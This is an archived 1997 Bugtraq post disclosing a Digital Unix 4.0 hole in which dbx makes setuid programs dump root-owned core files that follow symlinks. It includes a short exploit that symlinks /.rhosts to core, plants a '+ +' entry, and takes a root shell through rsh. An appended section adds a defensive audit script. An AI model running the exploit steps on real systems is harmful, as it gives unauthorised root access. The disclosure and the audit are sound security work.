Bugtraq mailing list archives
digital unix 4.0 hole
From: jmcdonal () OSPREY UNF EDU (John McDonald)
Date: Fri, 14 Nov 1997 12:37:20 -0500
I've verified this on 3 boxes running Digital Unix 4.0.. If you run dbx (tested on 3.11.10) on a setuid root program that you have read access to, the program will core dump and create a root-owned 600 perm core in the current directory. You might have to run dbx one or two times to get it to work.. The message you are looking for is:

    dbx version 3.11.10
    Type 'help' for help.
    warning: /bin/crontab has no symbol table -- very little is supported without it
    Could not attach to process 10112
    cannot run program
    Exiting due to error during startup

Now, this core dump will follow symlinks.. and using the trick mentioned earlier with embedding + + in a core dump, you can easily grab root.

    ln -s /.rhosts core
    BOB42=" + + "
    export BOB42
    dbx /bin/crontab
    rsh -l root localhost /bin/sh -i

I'm not sure this will work on other Digital Unix boxes, and I'm not sure why it works.. So, email me if you get it to work.. I'm not sure, but I think this might be a bug in the process-tracing implementation..

I think this will locate all of the vulnerable setuid binaries -

    find / -perm -4004 -print

humble -
jmcdonal () unf edu
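A defender-side audit for the two preconditions the post relies on, added here as an example and not part of the original message: it lists setuid binaries that are readable by others (the post's find, wrapped in a function) and flags .rhosts files that are symlinks or carry a "+ +" wildcard entry. The sample tree it builds under mktemp is constructed for the demo; run the functions against / and real home directories for an actual audit.

```shell
#!/bin/sh
# Audit for the two things the post depends on: dbx needs read access to the
# setuid target, and the root-owned core is only useful if it can land in a
# trusted file such as /.rhosts (via symlink) with a "+ +" wildcard inside.

# Print setuid files under $1 that are readable by "other" (mode bit 0004).
# Same test as the post's find, but scoped to a directory and reusable.
audit_setuid_readable() {
    find "$1" -type f -perm -4004 -print 2>/dev/null
}

# Flag a .rhosts path that is a symlink (the core-dump target in the post)
# or that contains a "+ +" wildcard line, which trusts any user on any host.
audit_rhosts() {
    f="$1"
    if [ -L "$f" ]; then
        echo "SYMLINK $f -> $(readlink "$f")"
    elif [ -f "$f" ] && grep -q '+[[:space:]]+' "$f"; then
        echo "WILDCARD $f"
    fi
}

# Constructed sample tree (not a real system): one world-readable setuid
# file, one execute-only setuid file, and a .rhosts with a wildcard line.
build_sample() {
    d=$(mktemp -d)
    mkdir -p "$d/bin" "$d/home"
    : > "$d/bin/readable"; chmod 4755 "$d/bin/readable"
    : > "$d/bin/execonly"; chmod 4711 "$d/bin/execonly"
    printf 'host1 alice\n+ +\n' > "$d/home/.rhosts"
    echo "$d"
}

# Demo run against the constructed tree; real use: audit_setuid_readable /
sample=$(build_sample)
echo "world-readable setuid files:"; audit_setuid_readable "$sample"
audit_rhosts "$sample/home/.rhosts"
rm -rf "$sample"
```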